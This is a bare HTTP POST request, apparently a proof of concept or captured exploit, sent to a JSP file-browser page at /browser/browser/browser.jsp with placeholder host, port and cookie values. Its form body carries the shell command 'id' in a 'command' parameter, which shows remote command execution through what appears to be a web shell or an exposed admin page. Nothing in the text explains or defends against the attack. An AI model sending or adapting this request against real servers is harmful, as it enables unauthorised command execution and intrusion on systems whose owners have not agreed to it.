POST http://hostx:portx/browser/browser/browser.jsp HTTP/1.1
Host: hostx:portx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.2) Gecko/20090729 Firefox/3.5.2 (.NET CLR 3.5.30729)
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Proxy-Connection: keep-alive
Referer: http://hostx:portx/browser/browser/browser.jsp
Cookie: cookiex 
Content-Type: application/x-www-form-urlencoded
Content-Length: 41 

text=&dir=/&command=id&Submit=Launch&sort=1
